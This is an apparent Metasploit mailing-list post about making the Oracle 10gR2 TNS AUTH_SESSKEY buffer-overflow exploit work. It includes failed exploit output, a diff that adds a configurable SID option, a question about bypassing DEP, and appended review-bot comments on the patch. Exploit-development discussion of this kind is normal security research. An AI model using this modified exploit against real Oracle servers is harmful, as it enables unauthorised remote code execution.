Metasploit mailing list archives
[enhancement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
From: Lukas Kuzmiak <lukash () backstep net>
Date: Wed, 11 Jan 2012 08:55:29 +0100
Hello there,

While playing with metasploit and Oracle I came to the mentioned exploit and tried to use it against Oracle Express Edition, getting this:

[*] Automatically detected target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] Sending NSPTCN packet ...
[*] Re-sending NSPTCN packet ...
[-] Exploit exception: OOPS, maybe the service hasn't started completely yet, try again...
[*] Exploit completed, but no session was created.

After reviewing the exploit I discovered there's a hardcoded sid ORCL, however this may not exist on every oracle system, so here's a tiny patch to turn it into an option. Can someone merge it please (if considered useful)?

However, even after disabling DEP the exploit never finishes as it's supposed to - after the call to kpoauth oracle.exe just ends up crashing like:

Access violation when reading [644B566A]

I haven't yet managed to look into this, but I'm going to - keeping this bug in mind: http://dev.metasploit.com/redmine/issues/812

I wanted to ask if there's some more generic way to bypass DEP in metasploit already, or if there's a recommended approach; I'd like to try implementing it into the module once I dig into it while debugging the issue mentioned above.

Thanks!

Cheers,
Lukas

Index: modules/exploits/windows/oracle/tns_auth_sesskey.rb =================================================================== --- modules/exploits/windows/oracle/tns_auth_sesskey.rb (revision 14537) +++ modules/exploits/windows/oracle/tns_auth_sesskey.rb (working copy) @@ -71,7 +71,8 @@ register_options( [ - Opt::RPORT(1521) + Opt::RPORT(1521), + OptString.new('SID', [ true, 'The database sid (has to exist!)', 'ORCL']) ], self.class) end @@ -125,7 +126,7 @@ connect_data = "" + "(DESCRIPTION=" + "(CONNECT_DATA=" + - "(SERVICE_NAME=orcl)" + + "(SERVICE_NAME=#{datastore['SID']})" + "(CID=" + "(PROGRAM=client.exe)" + "(HOST=client_host)" +
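Review bot: in the first hunk (@@ -71,7 +71,8 @@) the new option is named SID and described as "The database sid", but the second hunk feeds its value into the connect descriptor under SERVICE_NAME, and in Oracle's TNS connect syntax SID and SERVICE_NAME are distinct keys whose values need not be the same string. Either rename the option (or say in its description that the value is sent as the service name), or build the descriptor with `(SID=#{datastore['SID']})` so the option name and the wire format agree; as written, a user who supplies a correct SID that differs from the service name will get the same "no session was created" failure the post describes, with no hint why.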
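Review bot: in the second hunk (@@ -125,7 +126,7 @@) `datastore['SID']` is interpolated straight into the TNS connect descriptor with no validation, so a value containing `(`, `)` or `=` changes the structure of the descriptor rather than just the service name, and the resulting malformed NSPTCN packet will surface as the same unhelpful "OOPS, maybe the service hasn't started completely yet" exception quoted above. Suggest checking the option before building `connect_data` (for example rejecting anything outside alphanumerics, `_`, `.` and `$`) and raising a clear "invalid SID" error, which also makes the "has to exist!" note in the option description actionable for the user.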
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- [enhancement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Lukas Kuzmiak (Jan 10)
- Re: [enhancement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Tod Beardsley (Jan 11)
- Re: [enhancement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Joshua J. Drake (Jan 11)